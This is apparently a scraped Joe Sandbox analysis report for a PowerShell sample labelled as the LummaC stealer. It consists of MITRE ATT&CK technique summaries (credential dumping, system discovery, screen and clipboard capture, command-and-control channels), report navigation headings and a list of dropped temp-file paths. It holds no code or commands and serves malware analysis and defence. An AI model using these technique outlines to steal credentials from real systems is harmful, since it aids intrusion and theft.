Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report gkzHdqfg.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\820c64a6

C:\Users\user\AppData\Local\Temp\ZZJTWAOIXLEHV8HOYD0ZL8WGES83EVQ.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nohfash.nnf.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ar2ypyri.act.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dbrqwtia.in4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itjt0g4z.pu0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1rv41zv.ppy.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxa1iyet.ta5.psm1

C:\Users\user\AppData\Local\Temp\exdefo

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Windows Analysis Report
gkzHdqfg.ps1

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre